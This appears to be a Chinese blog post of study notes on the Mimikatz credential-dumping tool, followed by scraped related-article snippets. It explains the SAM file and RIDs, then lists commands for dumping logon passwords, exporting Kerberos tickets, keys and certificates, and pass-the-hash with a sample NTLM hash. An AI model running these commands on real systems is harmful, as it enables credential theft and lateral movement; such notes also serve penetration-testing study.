Mimikatz 使用学习
下载地址
https://github.com/gentilkiwi/mimikatz/
windows:https://download.csdn.net/download/think_ycx/9362975
官方使用教程
http://www.91ri.org/15178.html
windows密码文件的解读
加密方式链接:
https://blog.csdn.net/ytfhjhv/article/details/83513671
存储位置:C:\windows\system32\config\SAM
密码文件存储格式:
Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值
SID和RID的解读:
链接:https://www.secpulse.com/archives/72017.html
SID:安全标示符,是Windows系统用于唯一标识用户或组的可变长度结构
RID:Windows系统账户对应固定的RID
500: ADMINISTRATOR
501: GUEST
502: krbtgt(域环境)
512: Domain Admins(域环境)
513: Domain Users(域环境)
514: Domain Guests(域环境)
515: Domain Computers(域环境)
516: Domain Controllers(域环境)
命令
standard
退出
exit
清屏
cls
将所所有输出记录到文件中
log other.log
log /stop (停止文件记录)
从磁盘上的文件写入切换到Base64输出
base64
kerbreros::list /export
进入目录
cd xxx
privilege
privilege::debug
备注: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061表示所需的特权不是由客户端拥有的(通常您不是管理员)
crypto
提供的程序
crypto::providers
此命令列出系统存储中的逻辑存储
参数:
/systemstore- 可选 -必须使用列表存储系统存储(默认CERT_SYSTEM_STORE_CURRENT_USER),
它可以是一个:
CERT_SYSTEM_STORE_CURRENT_USER 要么 CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY 要么 USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE 要么 LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY 要么 LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE 要么 LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE 要么 CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS 要么 USERS
CERT_SYSTEM_STORE_SERVICES 要么 SERVICES
crypto::stores /systemstore:local_machine
此命令列出系统上或驱逐到系统上的智能卡/令牌读取器。
crypto::sc
此命令创建由证书颁发机构签名的用于智能卡身份验证的客户端证书
参数:
/caname -证书颁发机构的主题名称(需要签署证书)
/castore- 可选 -包含证书颁发机构的系统存储(默认:CERT_SYSTEM_STORE_LOCAL_MACHINE)
/upn-用户主要名称(UPN)为对象(如:user@lab.local)
/pfx- 可选 -用于保存最终证书的文件名(默认值:无文件,存储在中CERT_SYSTEM_STORE_CURRENT_USER)
crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx
此命令列出证书及其密钥的属性,它也可以到处证书
参数:
/systemstore- 可选 -必须使用系统存储(默认:CERT_SYSTEM_STORE_CURRENT_USER)
/store- 可选 -必须用于列出/导出证书的存储(默认值:My)-具有以下内容的完整列表crypto::stores
/export- 可选 -导出所有的证书文件(在公共部位DER,在私处PFX的文件-有密码保护:mimikatz)
/silent- 可选 -如果需要用户交互,则中止
/nokey- 可选 -请勿尝试与私钥进行交互
certificates /systemstore:local_machine /store:my /export
备注:
请参阅crypto::stores以获取有效systemstore列表,其输出用于store列表。
不可导出的键(带有KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b))通常可以通过crypto::capi和/或导出crypto::cng
尽管crypto::capi或crypto::cng补丁,你必须在正确的文件系统ACL访问私有密钥
一些智能卡加密提供商可以报告成功的私人出口
键
此命令按提供程序列出密钥。它也可以导出密钥。
参数:
/provider- 可选 -传统CryptoAPI提供商(默认:MS_ENHANCED_PROV)
/providertype- 可选 -传统CryptoAPI提供者类型(默认值:PROV_RSA_FULL)
/cngprovider- 可选 -的CNG提供商(默认:Microsoft Software Key Storage Provider)
/export- 可选 -将所有密钥导出到PVK文件
/silent- 可选 -如果需要用户交互,则中止
crypto::keys /export
sekurlsa
登录密码
sekurlsa::logonpasswords
pth
参数:
/user -您要模拟的用户名,请记住,管理员不是此知名帐户的唯一名称。
/domain-完全限定的域名-没有域,或者在本地用户/管理员的情况下,请使用计算机或服务器名称,workgroup或其他名称。
/rc4或/ntlm- 可选 -用户密码的RC4密钥/ NTLM哈希。
/aes128- 可选 -从用户密码和域领域派生的AES128密钥。
/aes256- 可选 -从用户密码和域域派生的AES256密钥。
/run- 可选 -要运行的命令行-默认为:cmd具有外壳。
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
备注:
此命令不适用于小型转储(废话);
它需要提升的特权(privilege::debug或SYSTEM帐户),与使用一种官方API的“通行票”不同;
这个新版本的“通过-散列”将RC4 keysKerberos 替换为ntlm散列(和/或替换AES密钥)-它允许Kerberos提供程序询问TGT票证!;
ntlm在XP / 2003 / Vista / 2008和7 / 2008r2 / 8/2012之前,哈希是必需的kb2871997(AES不可用或不可替换);
AES密钥只能在8.1 / 2012r2或7 / 2008r2 / 8/2012上替换为kb2871997,在这种情况下,您可以避免使用ntlm哈希。
tickets
sekurlsa::tickets /export
ekeys
sekurlsa::ekeys
dpapi
sekurlsa::dpapi
minidump
sekurlsa::minidump lsass.dmp
kerberos
sekurlsa::kerberos
lsadump
vault
token
event
ts
process
service
net
misc
library mimilib
driver mimidrv
以上命令官方教程都有,这就不在摘抄了。。。
Mimikatz 使用学习的更多相关文章
- [转帖]mimikatz 学习
mimikatz mimikatz 2.0 vient de sortir en version alpha binaires : https://github.com/gentilkiwi/mimi ...
- 如何防御mimikatz致敬Mimikatz攻防杂谈学习笔记
零.绪论:mimikatz简介 mimikatz是一款出色的内网渗透工具,可以抓取windows主机的明文密码.NTLMhash值或者kerberos对应的缓存凭据.mimikatz的使用在获取权限后 ...
- 23.通过MS17_010来学习msf对渗透的利用
Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:wi ...
- [转帖][思路/技术]Mimikatz的多种攻击方式以及防御方式
[思路/技术]Mimikatz的多种攻击方式以及防御方式 https://bbs.ichunqiu.com/thread-53954-1-1.html 之前学习过 抄密码 没想到还有这么多功能. ...
- Cobalt Strike学习笔记
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...
- msf学习笔记
metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...
- 黑盒渗透测试【转自HACK学习-FoxRoot】
因 搜到一篇写渗透测试步骤比较详细的文章,转过来学习,方便时常看看. 内容如下: 一.信息搜集 主动/被动搜集 信息搜集分为主动信息搜集和被动信息搜集. 主动信息搜集就是通过直接访问和扫描信息的方式进 ...
- 从直播编程到直播教育:LiveEdu.tv开启多元化的在线学习直播时代
2015年9月,一个叫Livecoding.tv的网站在互联网上引起了编程界的注意.缘于Pingwest品玩的一位编辑在上网时无意中发现了这个网站,并写了一篇文章<一个比直播睡觉更奇怪的网站:直 ...
- Angular2学习笔记(1)
Angular2学习笔记(1) 1. 写在前面 之前基于Electron写过一个Markdown编辑器.就其功能而言,主要功能已经实现,一些小的不影响使用的功能由于时间关系还没有完成:但就代码而言,之 ...
随机推荐
- swiper和tab相结合
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...
- RMAN备份与恢复 —— 参数文件还原
在RMAN用语中,“还原”与“恢复”具有不同的含义,还原(restore)是指访问先前生成的备份集,从中得到一个或多个对象,然后再磁盘上的某个位置还原这些对象.还原与恢复时分离的.恢复(re ...
- Dubbo一文入门
一.简介 系统的架构,已从最早的单体式架构(一个war包完事)逐渐发展到目前的微服务式架构.微服务,将一个大型的复杂的应用系统,拆分成若干独立的松耦合的小的服务工程,每个服务工程可独立部署,每个服务只 ...
- char 指针如何判断字符串需要输出长度
先上代码: #include <stdio.h> #include <string.h> ] = "; int func1(const char *ip) { pri ...
- wxpython中单选框的两种创建方式源码展示
#coding=utf-8 import wx class MyFrame(wx.Frame): def __init__(self): wx.Frame.__init__(self,None,-1, ...
- 关于AndroidStudio 配置的默认路径的修改
AndroidStudio的配置默认路径在 C:\Users\用户名\.AndroidStudio3.0 下,在这里会有一个缺点是C盘会常常空间不够用,所以我就想改到其他盘的.看图: Android ...
- Spring、Spring MVC、Struts2、、优缺点整理(转)
Spring 及其优点 大部分项目都少不了spring的身影,为什么大家对他如此青睐,而且对他的追捧丝毫没有减退之势呢 Spring是什么: Spring是一个轻量级的DI和AOP容器框架. 说它轻量 ...
- mysql安装,卸载; 库和表的基础操作
数据库 """ 1.什么是数据库:管理数据的系统 - 安装某种管理数据的系统 - 管理的对象本质是文件 2.存储数据的位置:内存.硬盘 3.什么是系统:运行在硬件基础上 ...
- 继承和构造函数语法造成的一个bug
一 出错误的代码 开发环境: visual studio 2017 社区版 #include "pch.h" #include <iostream> #include ...
- 记人生中第一场认真打的CF——CF1000(虽然是Virtual participation)
老师说下午要让我们(来自开明的新高一同学)感受一下CF,于是下午2:20我们就集中到了机房.老师教我们用Educational Codeforces Round 46 (Rated for Div. ...